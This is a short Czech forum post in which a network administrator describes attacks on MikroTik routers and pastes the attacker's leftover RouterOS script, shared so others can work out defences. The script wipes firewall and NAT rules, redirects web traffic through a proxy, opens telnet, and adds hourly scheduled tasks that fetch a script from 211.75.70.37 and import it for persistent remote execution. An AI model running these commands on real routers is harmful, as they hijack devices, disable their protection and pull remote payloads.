Ahoj,
mám podobné zkušenosti. Napadeno pár strojů, ale škody nulové, měli jsme tu dva typy, jeden skapal na právech a nestihnul zamést hlavní script, z toho se dá vyčíst obrana, třeba někomu pomůže :
/ip dns set servers=8.8.8.8
/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move destination=0
/ip firewall filter remove
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html
/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set telnet disabled=no port=2300
/ip service set winbox disabled=no port=8291
3s
/system scheduler add name="udpll3" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll4" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/error.html mode=http dst-path=flash/webproxy/error.html" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll5" interval=1h start-time=startup on-event="/tool fetch url=http://211.75.70.37/u113.exe mode=http dst-path=u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/system scheduler add name="udpll6" interval=1.01h start-time=startup on-event="/import u113.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write
/ip cloud set ddns-enabled=yes
/file remove u113.rsc
Další byl sofistikovanější, ale také neprošel mrzák naštěstí na další stroje:
<--- ia1 -->aa.png<--- ia1 -->
<--- ia0 -->bb.png<--- ia0 -->